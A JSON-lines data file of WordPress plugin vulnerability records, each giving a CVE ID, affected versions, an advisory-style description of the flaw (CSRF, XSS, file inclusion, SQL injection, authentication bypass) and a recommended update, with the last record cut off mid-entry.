{"CVE_ID":"CVE-2025-1506","slug":"wp-social","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.0. This is due to missing or incorrect nonce validation on the counter_access_key_setup() function. This makes it possible for unauthenticated attackers to update social login provider settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-social\\\/tags\\\/3.0.9\\\/inc\\\/counter.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-social\\\/tags\\\/3.0.9\\\/inc\\\/counter.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246155\\\/wp-social\\\/trunk\\\/inc\\\/counter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246155\\\/wp-social\\\/trunk\\\/inc\\\/counter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/669833b3-1689-4051-8990-c6eddae4858f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/669833b3-1689-4051-8990-c6eddae4858f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12820","slug":"google-distance-calculator","versionImpact":"3.1","versionEndExcluding":"3.1.1","description":"The MK Google Directions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'MKGD' shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246361\\\/google-distance-calculator\\\/tags\\\/3.1.1\\\/mk-google-directions.php?old=3046209&old_path=google-distance-calculator%2Ftags%2F3.1%2Fmk-google-directions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246361\\\/google-distance-calculator\\\/tags\\\/3.1.1\\\/mk-google-directions.php?old=3046209&old_path=google-distance-calculator%2Ftags%2F3.1%2Fmk-google-directions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b3570c-cd8e-4dec-bbad-6374c44530bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b3570c-cd8e-4dec-bbad-6374c44530bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36751","slug":"coupon-creator","versionEndExcluding":"3.1.1","description":"The Coupon Creator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1. This is due to missing or incorrect nonce validation on the save_meta() function. This makes it possible for unauthenticated attackers to save meta fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368658\\\/coupon-creator\\\/tags\\\/2.5.2.1\\\/plugin-engine\\\/src\\\/Pngx\\\/Admin\\\/Meta.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368658\\\/coupon-creator\\\/tags\\\/2.5.2.1\\\/plugin-engine\\\/src\\\/Pngx\\\/Admin\\\/Meta.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab57f010-4fd2-40c2-950f-c03888521c8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab57f010-4fd2-40c2-950f-c03888521c8f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12452","slug":"ziggeo","versionImpact":"3.1","versionEndExcluding":"3.1.1","description":"The Ziggeo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ziggeo_event' shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ziggeo\\\/tags\\\/3.1\\\/core\\\/events.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ziggeo\\\/tags\\\/3.1\\\/core\\\/events.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242184%40ziggeo&new=3242184%40ziggeo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242184%40ziggeo&new=3242184%40ziggeo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be82095d-2b15-432e-a667-523286fa9629?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be82095d-2b15-432e-a667-523286fa9629?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3808","slug":"porto-functionality","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The Porto Theme - Functionality plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.1.0 via the 'porto_portfolios' shortcode 'portfolio_layout' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea96f84-f75b-4f02-9ca8-f8fda439d565?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea96f84-f75b-4f02-9ca8-f8fda439d565?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/porto-responsive-wordpress-ecommerce-theme\\\/9207399\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/porto-responsive-wordpress-ecommerce-theme\\\/9207399\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0380","slug":"easy-digital-downloads","versionEndExcluding":"3.1.0.5","description":"The Easy Digital Downloads WordPress plugin before 3.1.0.5 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3256e090-1131-459d-ade5-f052cd5d189f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3256e090-1131-459d-ade5-f052cd5d189f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3599","slug":"gdpr-cookie-consent","versionImpact":"3.0.2","versionEndExcluding":"3.1.0","description":"The WP Cookie Consent ( for GDPR, CCPA & ePrivacy ) plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the gdpr_policy_process_delete() function in all versions up to, and including, 3.0.2. This makes it possible for unauthenticated attackers to delete arbitrary posts.","recommendation":"Update to version 3.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b9abbf1-d9f5-4406-9d0c-bc2f9891d0e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b9abbf1-d9f5-4406-9d0c-bc2f9891d0e8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071278\\\/gdpr-cookie-consent\\\/tags\\\/3.1.0\\\/admin\\\/class-gdpr-cookie-consent-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071278\\\/gdpr-cookie-consent\\\/tags\\\/3.1.0\\\/admin\\\/class-gdpr-cookie-consent-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4390","slug":"depicter","versionImpact":"3.0.2","versionEndExcluding":"3.1.0","description":"The Slider and Carousel slider by Depicter plugin for WordPress is vulnerable to Arbitrary Nonce Generation in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers with contributor access and above, to generate a valid nonce for any WordPress action\/function. This could be used to invoke functionality that is protected only by nonce checks.","recommendation":"Update to version 3.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd7c3a5d-b8aa-45cb-983c-55ba7e3d72f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd7c3a5d-b8aa-45cb-983c-55ba7e3d72f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/SecurityAjaxController.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/SecurityAjaxController.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3103357%40depicter%2Ftrunk&old=3090538%40depicter%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3103357%40depicter%2Ftrunk&old=3090538%40depicter%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0521","slug":"post-smtp","versionImpact":"3.0.2","versionEndExcluding":"3.1.0","description":"The Post SMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the from and subject parameter in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3237626%40post-smtp%2Ftrunk&old=3229076%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3237626%40post-smtp%2Ftrunk&old=3229076%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/366dfbf1-870c-4ce3-abc4-a2b2f4e72175?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/366dfbf1-870c-4ce3-abc4-a2b2f4e72175?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13556","slug":"affiliate-links","versionImpact":"3.0.1","versionEndExcluding":"3.1.0","description":"The Affiliate Links: WordPress Plugin for Link Cloaking and Link Management plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.0.1 via deserialization of untrusted input from an file export. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 3.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238736%40affiliate-links&new=3238736%40affiliate-links&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238736%40affiliate-links&new=3238736%40affiliate-links&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/290027c3-6b0a-43b9-9220-b8c641eb73f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/290027c3-6b0a-43b9-9220-b8c641eb73f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3809","slug":"porto-functionality","versionImpact":"3.0.9","versionEndExcluding":"3.1.0","description":"The Porto Theme - Functionality plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.0.9 via the 'slideshow_type' post meta. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 3.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5cdd3c1-6353-4bee-a4f9-5b7972f0970c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5cdd3c1-6353-4bee-a4f9-5b7972f0970c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/porto-responsive-wordpress-ecommerce-theme\\\/9207399\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/porto-responsive-wordpress-ecommerce-theme\\\/9207399\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5126","slug":"delete-me","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The Delete Me plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'plugin_delete_me' shortcode in versions up to, and including, 3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The shortcode is not displayed to administrators, so it cannot be used against administrator users.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a5123a7-8eb4-481e-88fe-6310be37a077?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a5123a7-8eb4-481e-88fe-6310be37a077?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-me\\\/tags\\\/3.0\\\/inc\\\/shortcode.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-me\\\/tags\\\/3.0\\\/inc\\\/shortcode.php#L83\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5430","slug":"jquery-news-ticker","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The Jquery news ticker plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985559\\\/jquery-news-ticker#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985559\\\/jquery-news-ticker#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b7f8739-7f40-40a7-952e-002ea3b82ac7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b7f8739-7f40-40a7-952e-002ea3b82ac7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-news-ticker\\\/trunk\\\/jquery-news-ticker.php?rev=2827068#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-news-ticker\\\/trunk\\\/jquery-news-ticker.php?rev=2827068#L92\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2018-25105","slug":"wp-file-manager","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The  File Manager plugin for WordPress is vulnerable to authorization bypass due to a missing capability check in the \/inc\/root.php file in versions up to, and including, 3.0. This makes it possible for unauthenticated attackers to download arbitrary files from the server and upload arbitrary files that can be used for remote code execution.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a56d5a2f-ae13-4523-bc4a-17bb2fb4c6f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a56d5a2f-ae13-4523-bc4a-17bb2fb4c6f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1942390%40wp-file-manager&new=1942390%40wp-file-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1942390%40wp-file-manager&new=1942390%40wp-file-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6626","slug":"gm-woocommerce-quote-popup","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/327ae124-79eb-4e07-b029-e4f543cbd356\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/327ae124-79eb-4e07-b029-e4f543cbd356\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5659","slug":"interact-quiz-embed","versionImpact":"3.0.7","versionEndExcluding":"3.1","description":"The Interact: Embed A Quiz On Your Site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'interact-quiz' shortcode in all versions up to, and including, 3.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69ba1a39-ddb0-4661-8104-d8bb71710e0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69ba1a39-ddb0-4661-8104-d8bb71710e0c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interact-quiz-embed\\\/tags\\\/3.0.7\\\/interact-quiz-embed.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interact-quiz-embed\\\/tags\\\/3.0.7\\\/interact-quiz-embed.php#L53\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1294","slug":"sunshine-photo-cart","versionImpact":"3.0.24","versionEndExcluding":"3.1","description":"The Sunshine Photo Cart: Free Client Galleries for Photographers plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.24 via the 'invoice'. This makes it possible for unauthenticated attackers to extract sensitive data including customer email and physical addresses.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da76d034-3e9a-4f3f-a314-48e776028369?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da76d034-3e9a-4f3f-a314-48e776028369?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sunshine-photo-cart\\\/tags\\\/3.0.24\\\/includes\\\/admin\\\/sunshine-order.php#L894\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sunshine-photo-cart\\\/tags\\\/3.0.24\\\/includes\\\/admin\\\/sunshine-order.php#L894\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033429\\\/sunshine-photo-cart\\\/trunk\\\/includes\\\/admin\\\/sunshine-order.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3033429\\\/sunshine-photo-cart\\\/trunk\\\/includes\\\/admin\\\/sunshine-order.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11952","slug":"classic-addons-wpbakery-page-builder-addons","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The Classic Addons \u2013 WPBakery Page Builder plugin for WordPress is vulnerable to Limited Local PHP File Inclusion in all versions up to, and including, 3.0 via the 'style' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, and permissions granted by an Administrator, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The vulnerability is limited to PHP files in a Windows environment.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classic-addons-wpbakery-page-builder-addons\\\/tags\\\/3.1\\\/addons\\\/testimonial-slider-item\\\/testimonial-slider-item.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classic-addons-wpbakery-page-builder-addons\\\/tags\\\/3.1\\\/addons\\\/testimonial-slider-item\\\/testimonial-slider-item.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9645b17e-6a7c-4cdd-ae43-7d2c84b624cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9645b17e-6a7c-4cdd-ae43-7d2c84b624cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2685","slug":"tablepress","versionImpact":"3.0.4","versionEndExcluding":"3.1","description":"The TablePress \u2013 Tables in WordPress made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018table-name\u2019 parameter in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/views\\\/class-all-tables-list-table.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/views\\\/class-all-tables-list-table.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261229\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261229\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e285849f-886e-49ba-bb43-8c67655fe239?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e285849f-886e-49ba-bb43-8c67655fe239?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9820","slug":"two-factor-login-telegram","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The WP 2FA with Telegram plugin for WordPress is vulnerable to Two-Factor Authentication Bypass in versions up to, and including, 3.0. This is due to the two-factor code being stored in a cookie, which makes it possible to bypass two-factor authentication.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd73030-7185-4302-b3fd-29cbbe716e3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd73030-7185-4302-b3fd-29cbbe716e3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/two-factor-login-telegram\\\/tags\\\/3.0\\\/includes\\\/class-wp-factor-telegram-plugin.php#L228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/two-factor-login-telegram\\\/tags\\\/3.0\\\/includes\\\/class-wp-factor-telegram-plugin.php#L228\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9687","slug":"two-factor-login-telegram","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The WP 2FA with Telegram plugin for WordPress is vulnerable to Authentication Bypass in versions up to, and including, 3.0. This is due to insufficient validation of the user-controlled key on the 'validate_tg' action. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in as any existing user on the site, such as an administrator.","recommendation":"Update to version 3.1, or a newer patched 